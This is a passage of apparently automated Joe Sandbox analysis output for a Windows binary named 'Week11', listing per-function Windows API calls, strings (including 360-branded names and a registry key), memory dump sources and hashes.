                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ClassRegister$CriticalSection$CursorInfoLeaveLoadMessageWindow$Enter__recalloc_memset
                                • String ID: AtlAxWin90$AtlAxWinLic90$CrashReport.dll$WM_ATLGETCONTROL$WM_ATLGETHOST
                                • API String ID: 3653313455-3137487555
                                • Opcode ID: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
                                • Instruction ID: 18c47c28d217803acd38e2e350ea736b05d0220bbaa245b44b76b35cf6954bd6
                                • Opcode Fuzzy Hash: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
                                • Instruction Fuzzy Hash: 59414BB55083409FC340DF56D888A2AFBE8FBC8755F404A2FF48893261D7B49A04CF9A
                                APIs
                                • CreateCompatibleDC.GDI32(?), ref: 0042A314
                                • CreateCompatibleBitmap.GDI32(?,00000004,00000004), ref: 0042A324
                                • SelectObject.GDI32(00000000,00000000), ref: 0042A32F
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042A340
                                • GdipCreateSolidFill.GDIPLUS(000000FF,?,00000000,?), ref: 0042A357
                                • GdipFillRectangleI.GDIPLUS(?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A367
                                • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A377
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A3A9
                                • GdipGetFontHeight.GDIPLUS(?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A3D3
                                • GdipCreateStringFormat.GDIPLUS(00005000,00000000,?,?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000), ref: 0042A3FD
                                • GetPixel.GDI32(?,00000000,00000000), ref: 0042A476
                                • GdipDeleteBrush.GDIPLUS(?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000), ref: 0042A4A2
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?), ref: 0042A4AB
                                • GdipDeleteFont.GDIPLUS(?,00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A4B4
                                • SelectObject.GDI32(00000000,?), ref: 0042A4C1
                                • GdipDeleteFontFamily.GDIPLUS(?), ref: 0042A4CB
                                • GdipDeleteGraphics.GDIPLUS(?,?), ref: 0042A4D4
                                • DeleteObject.GDI32(?), ref: 0042A4E1
                                • DeleteDC.GDI32(00000000), ref: 0042A4EC
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Delete$Create$FontObject$BrushCompatibleFillFormatSelectString$BitmapFamilyFromGraphicsHeightHintPixelRectangleRenderingSolidText
                                • String ID:
                                • API String ID: 2633235991-0
                                • Opcode ID: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
                                • Instruction ID: 4e80d2d929e380933f70dbde1135d6243de09a489c9987241f35bfaf6d66798b
                                • Opcode Fuzzy Hash: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
                                • Instruction Fuzzy Hash: 77818071A00219EFCB10EFA5DC84AEEBBB8FF45314F11811EF914A7241D778A945CBA9
                                APIs
                                • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004407EC
                                • IsWindow.USER32(?), ref: 004407FB
                                • GetSysColor.USER32(00000005), ref: 0044083B
                                • GetWindowLongW.USER32(?,000000F0), ref: 004408EB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$ColorLongRedraw
                                • String ID:
                                • API String ID: 4056730343-0
                                • Opcode ID: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
                                • Instruction ID: 98fc8f41d6d163022ece6be5d9d68c41223d0c7f9aca896b60a9b6a68b633fc1
                                • Opcode Fuzzy Hash: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
                                • Instruction Fuzzy Hash: E4C19D742042029FE710DF59C884B6B77E9EF88714F14852EFA449B3A1CB38EC55CBA9
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 0043E9E7
                                • GetWindowLongW.USER32(?,000000EC), ref: 0043E9F7
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0043EA02
                                • GetWindowLongW.USER32(?,000000EB), ref: 0043EA10
                                • OleUninitialize.OLE32 ref: 0043EA22
                                • OleInitialize.OLE32(00000000), ref: 0043EA2F
                                • GetWindowTextLengthW.USER32(?), ref: 0043EA36
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 0043EA93
                                • SetWindowTextW.USER32(?,004BCD08), ref: 0043EA9F
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0043EAC8
                                • GlobalLock.KERNEL32(00000000), ref: 0043EAD5
                                • _memcpy_s.LIBCMT ref: 0043EAE7
                                • GlobalUnlock.KERNEL32(00000000), ref: 0043EAF0
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0043EAFD
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0043EBF9
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$GlobalLong$Text$AllocCreateInitializeLengthLockProcStreamUninitializeUnlock_memcpy_s
                                • String ID:
                                • API String ID: 2032182138-0
                                • Opcode ID: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
                                • Instruction ID: c0f04b444a69283280af9de96a8451d22a1e08eb451a14ff96d4003cf6866933
                                • Opcode Fuzzy Hash: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
                                • Instruction Fuzzy Hash: 2C816C71901215AFDB11EF69CC45FAFBBB8AF48310F14465AF502A7291DB38AD01CBA9
                                APIs
                                • FindWindowW.USER32(Q360PromoClass,00000000), ref: 00464972
                                • PostMessageW.USER32(00000000,00000010,00000000,00000040), ref: 0046497F
                                • ShowWindow.USER32(?,00000000), ref: 0046498E
                                • SetEvent.KERNEL32(?), ref: 004649AA
                                • CloseHandle.KERNEL32(?), ref: 004649B3
                                • SetEvent.KERNEL32(?), ref: 004649C9
                                • CloseHandle.KERNEL32(?), ref: 004649D2
                                • GetCurrentThreadId.KERNEL32 ref: 00464A73
                                • EnterCriticalSection.KERNEL32(?), ref: 00464A85
                                • LeaveCriticalSection.KERNEL32(?), ref: 00464ACE
                                • PostQuitMessage.USER32(00000000), ref: 00464AF9
                                • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00464B15
                                Strings
                                Similarity
                                • API ID: CloseCriticalEventHandleMessagePostSectionWindow$CurrentEnterExceptionFindLeaveQuitRaiseShowThread
                                • String ID: Q360PromoClass$Q360PromoClassLow
                                • API String ID: 1959851942-3614897671
                                • Opcode ID: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
                                • Instruction ID: 56d757dafd0a474b3a4655ae57a73f5c183d514a9328f596b2a00afd5098ce85
                                • Opcode Fuzzy Hash: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
                                • Instruction Fuzzy Hash: E2519475600300AFDB10DF65DC84B5773A9BF88714F144A2EED459B392EB38E801CBA9
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E686
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E69D
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042E6E5
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E70F
                                • GdipAlloc.GDIPLUS(00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E722
                                • GdipGetImageGraphicsContext.GDIPLUS(?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E740
                                • GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E752
                                • GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?), ref: 0042E763
                                Similarity
                                • API ID: Gdip$Image$AllocMode$BitmapContextCreateFromGraphicsHeightOffsetPixelScan0SmoothingWidth
                                • String ID:
                                • API String ID: 3931329870-0
                                • Opcode ID: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
                                • Instruction ID: f30007c343395d4d28bcef7463d0b73f766beae805a266994da5c3ec7389f55b
                                • Opcode Fuzzy Hash: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
                                • Instruction Fuzzy Hash: 6B7140B0A0020AEFDB10DFA6D985AAFBBF8EF44744F10895EE959E7240E734DD418B54
                                APIs
                                • GetCurrentProcessId.KERNEL32(1D1D1D8C,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A336
                                  • Part of subcall function 0047A070: _vswprintf_s.LIBCMT ref: 0047A09A
                                • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A36B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A37E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A38E
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3AC
                                • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3BD
                                • __CxxThrowException@8.LIBCMT ref: 0047A3F7
                                • __CxxThrowException@8.LIBCMT ref: 0047A421
                                • ReleaseMutex.KERNEL32(00000000), ref: 0047A439
                                • CloseHandle.KERNEL32(00000000), ref: 0047A444
                                Strings
                                Similarity
                                • API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
                                • String ID: %s %u$(bN$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                • API String ID: 3526415198-3071653440
                                • Opcode ID: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
                                • Instruction ID: e194817bf2e7d16d4174f96520751dd94e0059aed73972de63d2eca86cb6f0f9
                                • Opcode Fuzzy Hash: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
                                • Instruction Fuzzy Hash: 8E41D7719002449FCB10EFA4DC85BEE77B8EB44714F10863EE909A7291DB7D49498B5A
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360MachineSignature,00000000,00020119,?,00000000,004BE8F0,00000000,?,?,?,00474D3E,?,?), ref: 00474926
                                • RegQueryValueExW.ADVAPI32(?,Operator,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 0047496D
                                • RegQueryValueExW.ADVAPI32(?,IssueDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749B4
                                • RegQueryValueExW.ADVAPI32(?,ExpirationDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749F3
                                • RegQueryValueExW.ADVAPI32(?,SignData,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 00474A2A
                                • RegCloseKey.ADVAPI32(?), ref: 00474A68
                                • RegCloseKey.ADVAPI32(?,?,?,00474D3E,?,?), ref: 00474A81
                                Strings
                                Similarity
                                • API ID: QueryValue$Close$Open
                                • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                • API String ID: 2895014784-1479031278
                                • Opcode ID: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
                                • Instruction ID: 8bcaa0cccb2167316de61ac67ccb373c22614a393bd1e79f74d8290c9f3a834f
                                • Opcode Fuzzy Hash: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
                                • Instruction Fuzzy Hash: 015146B16443029FD320CF58D881A7BB7E8EBD8790F05492EF599D3210E734E909CB59
                                APIs
                                • GdipAlloc.GDIPLUS(0000000C,?,?,?), ref: 0042A70D
                                • GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?,?,?), ref: 0042A739
                                • GdipAlloc.GDIPLUS(0000000C,?), ref: 0042A898
                                • GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?), ref: 0042A8BF
                                Strings
                                Similarity
                                • API ID: Gdip$AllocFontMemoryPrivate
                                • String ID: .ttf$IDI_ICON_FONT$T9N$_EXT.ttf$common$default$theme_attrib
                                • API String ID: 1909619073-1496135245
                                • Opcode ID: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
                                • Instruction ID: 2ff41819fe04ce0788ad32e2a70418eca4de3f8adaeef7079eae5f51084d470c
                                • Opcode Fuzzy Hash: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
                                • Instruction Fuzzy Hash: 1EE14371E00204DFCB04DFA9E881A9EB7B4EF44314F54826EE915AB391CB38AD45CB99
                                APIs
                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EB07
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EB0E
                                • GetTokenInformation.ADVAPI32(?), ref: 0047EB81
                                • GetLastError.KERNEL32 ref: 0047EB87
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EBB0
                                Strings
                                Similarity
                                • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                • String ID: T9N
                                • API String ID: 2078281146-185908819
                                • Opcode ID: 11a4bc241aaeac857d7296d65073594a5bf2b67527f86d9c47c556f244f4f811
                                • Instruction ID: a7f82cc93c5bb8a685682d5b3753467e8f8e4996987ecc2c1e7f637546b255b2
                                • Opcode Fuzzy Hash: 11a4bc241aaeac857d7296d65073594a5bf2b67527f86d9c47c556f244f4f811
                                • Instruction Fuzzy Hash: 2481BF766047018FC310DF29D881A5AB7E8FB89324F144B2EF959973D0DB39E905CB9A
                                APIs
                                • GetTickCount.KERNEL32 ref: 004487F9
                                  • Part of subcall function 0048DE2F: __getptd.LIBCMT ref: 0048DE34
                                • _memset.LIBCMT ref: 0044881B
                                • _wcsncpy.LIBCMT ref: 00448830
                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 0044883F
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 00448872
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 0044888B
                                • _rand.LIBCMT ref: 004488BE
                                • MoveFileW.KERNEL32(?,?), ref: 00448932
                                • GetLastError.KERNEL32 ref: 0044893C
                                Strings
                                Similarity
                                • API ID: FileObjectSingleWait$CountErrorLastMovePathRemoveSpecTick__getptd_memset_rand_wcsncpy
                                • String ID: %s\%d$T9N
                                • API String ID: 1256354863-135519442
                                • Opcode ID: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
                                • Instruction ID: 00aa38c6076ddc401274eeeea048ddfd2baf4b4b3fab62e7f4c05b26532d5765
                                • Opcode Fuzzy Hash: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
                                • Instruction Fuzzy Hash: 9A8190B1A006059FD710DF68CC85AAEB3B5FF49324F2487AEE019DB2A1DB349E45CB54
                                APIs
                                • ____lc_handle_func.LIBCMT ref: 004A8873
                                • ____lc_codepage_func.LIBCMT ref: 004A887B
                                • __GetLocaleForCP.LIBCPMT ref: 004A88A4
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A88BA
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,?,00000002,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A88D9
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A88E7
                                • ___pctype_func.LIBCMT ref: 004A890C
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A8932
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A894A
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A8962
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A896F
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000001,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A89A0
                                Similarity
                                • API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
                                • String ID:
                                • API String ID: 3819326198-0
                                • Opcode ID: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
                                • Instruction ID: be4efcea82c7acbbaf84cbdbf0495d91bd9ba5531dcccb3550ff59639d1780ae
                                • Opcode Fuzzy Hash: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
                                • Instruction Fuzzy Hash: 8841B471104246AEDB206F319C41B7B7BA9EF23351F24842FF8559A292DF3CC950DB59
                                APIs
                                • _memset.LIBCMT ref: 0047AB3D
                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0047AB4F
                                • LoadLibraryW.KERNEL32(?), ref: 0047ABEE
                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 0047ABFA
                                • LoadLibraryW.KERNEL32(?), ref: 0047AC5F
                                • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 0047AC6B
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc$FolderPath_memset
                                • String ID: SetProcessDPIAware$SetProcessDpiAwareness$\Shcore.dll$\User32.dll
                                • API String ID: 1748625455-566016977
                                • Opcode ID: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
                                • Instruction ID: 93c2aa1886c6c8e1d4854a4f4d751b754c41071df73770d687a8d629c2286f7f
                                • Opcode Fuzzy Hash: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
                                • Instruction Fuzzy Hash: 3A51AFB1508341AFD721EB64D845B9FB7E8AFC5704F44882EF98983241D679E818CB5B
                                APIs
                                • GdipResetPath.GDIPLUS(?), ref: 004248BA
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?), ref: 00424903
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 0042492F
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424956
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042497F
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?,?,?), ref: 004249B4
                                • GdipClosePathFigure.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424A7B
                                  • Part of subcall function 004246F0: GdipResetPath.GDIPLUS(?), ref: 0042471A
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB
                                Similarity
                                • API ID: GdipPath$Line$Reset$CloseFigure
                                • String ID:
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 0042E36A
                                • VariantCopy.OLEAUT32(?,00000000), ref: 0042E375
                                • VariantClear.OLEAUT32(?), ref: 0042E3AD
                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042E3CD
                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042E3E6
                                • VariantInit.OLEAUT32(?), ref: 0042E40C
                                • VariantCopy.OLEAUT32(?,?), ref: 0042E41A
                                • VariantClear.OLEAUT32(?), ref: 0042E455
                                • VariantClear.OLEAUT32(?), ref: 0042E45B
                                • SafeArrayUnlock.OLEAUT32(?), ref: 0042E461
                                • SafeArrayDestroy.OLEAUT32(?), ref: 0042E46C
                                Similarity
                                • API ID: Variant$ArraySafe$Clear$BoundCopyInit$DestroyUnlock
                                • String ID:
                                APIs
                                • IsWindow.USER32(?), ref: 00436671
                                • CreateCompatibleDC.GDI32(00000000), ref: 00436693
                                • SelectObject.GDI32(00000000), ref: 004366A5
                                • GetWindowRect.USER32(?,?), ref: 004366B9
                                • OffsetRect.USER32(?,0000000A,0000000A), ref: 004366D8
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004366EF
                                • GetClientRect.USER32(?,?), ref: 00436705
                                  • Part of subcall function 00433A00: CreateCompatibleDC.GDI32(?), ref: 00433A32
                                  • Part of subcall function 00433A00: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00433A4C
                                  • Part of subcall function 00433A00: SelectObject.GDI32(?,00000000), ref: 00433A59
                                  • Part of subcall function 00433A00: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00433A73
                                • SendMessageW.USER32(?,000007E9,?,00000000), ref: 00436727
                                  • Part of subcall function 00433990: BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004339B2
                                  • Part of subcall function 00433990: SelectObject.GDI32(?,?), ref: 004339BF
                                  • Part of subcall function 00433990: DeleteObject.GDI32(?), ref: 004339CD
                                  • Part of subcall function 00433990: DeleteDC.GDI32(?), ref: 004339EB
                                • SetViewportOrgEx.GDI32(00000000,00000000,?,00000000), ref: 0043673D
                                • SelectObject.GDI32(00000000,?), ref: 00436748
                                • DeleteDC.GDI32(00000000), ref: 0043674F
                                Similarity
                                • API ID: Object$Select$CompatibleCreateDeleteRectViewport$Window$BitmapClientMessageOffsetSend
                                • String ID:
                                APIs
                                • __wcsicoll.LIBCMT ref: 00436905
                                • PathRemoveFileSpecW.SHLWAPI(00000000,?), ref: 00436A8B
                                • SysFreeString.OLEAUT32(00000000), ref: 00436AC4
                                • __wcsicoll.LIBCMT ref: 00436ACF
                                • PostMessageW.USER32(00000000,00000785,00000000,00000000), ref: 00436B86
                                • InvalidateRect.USER32(00000000,00000000,00000001), ref: 00436BA5
                                Similarity
                                • API ID: __wcsicoll$FileFreeInvalidateMessagePathPostRectRemoveSpecString
                                • String ID: T9N$T9N$default
                                APIs
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,?), ref: 004289A3
                                • GetDC.USER32(00000000), ref: 004289F7
                                • DeleteDC.GDI32(00000000), ref: 00428A11
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78,?), ref: 00428A66
                                • GdipFree.GDIPLUS(00000000,00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78), ref: 00428A6C
                                • CopyRect.USER32(?,?), ref: 00428A96
                                • GdipDeleteFont.GDIPLUS(?), ref: 00428B11
                                • DeleteObject.GDI32(?), ref: 00428B1A
                                Similarity
                                • API ID: Delete$Gdip$Font$CopyCreateFreeGraphicsObjectRect
                                • String ID: xK
                                APIs
                                  • Part of subcall function 0048C58E: __EH_prolog3_catch.LIBCMT ref: 0048C595
                                • _memset.LIBCMT ref: 0046CC31
                                • SHGetFileInfoW.SHELL32(00000001,00000000,00000000,000002B4,00004201), ref: 0046CC89
                                • GetFileAttributesW.KERNEL32(00000001), ref: 0046CC94
                                • PathFindFileNameW.SHLWAPI(00000001,00000104), ref: 0046CCA9
                                • PathFindFileNameW.SHLWAPI(00000001,00000104), ref: 0046CCE5
                                • _wcsncpy.LIBCMT ref: 0046CCF3
                                • _memset.LIBCMT ref: 0046CD06
                                • SendMessageW.USER32(00000001,00001132,00000000,?), ref: 0046CD83
                                Similarity
                                • API ID: File$FindNamePath_memset$AttributesH_prolog3_catchInfoMessageSend_wcsncpy
                                • String ID: T9N
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 0044C562
                                  • Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A
                                • __CxxThrowException@8.LIBCMT ref: 0044C5B6
                                • __CxxThrowException@8.LIBCMT ref: 0044C5F0
                                • __CxxThrowException@8.LIBCMT ref: 0044C62C
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: ,&L$,&L$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                APIs
                                • GetModuleHandleW.KERNEL32(?,?), ref: 0044E0EA
                                • GetCurrentProcessId.KERNEL32(?,?), ref: 0044E10B
                                • _memset.LIBCMT ref: 0044E138
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000207), ref: 0044E14E
                                • PathAppendW.SHLWAPI(00000000,..\), ref: 0044E170
                                • PathAppendW.SHLWAPI(00000000,360conf.dll), ref: 0044E17A
                                • StrCmpIW.SHLWAPI(00000000), ref: 0044E184
                                Similarity
                                • API ID: AppendModulePath$CurrentFileHandleNameProcess_memset
                                • String ID: ..\$360conf.dll
                                APIs
                                Similarity
                                • API ID: __fileno$__cftof__getbuf__wctomb_s_l
                                • String ID:
                                APIs
                                • ShowWindow.USER32(?,00000005,?,?,00000000,?,?,?,?,1D1D1D8C,?,?), ref: 0046C0FB
                                • IsWindow.USER32(?), ref: 0046C11E
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046C12E
                                • IsWindow.USER32(?), ref: 0046C147
                                • TranslateMessage.USER32(?), ref: 0046C163
                                • DispatchMessageW.USER32(?), ref: 0046C16D
                                • IsWindow.USER32(?), ref: 0046C177
                                • IsWindow.USER32(?), ref: 0046C193
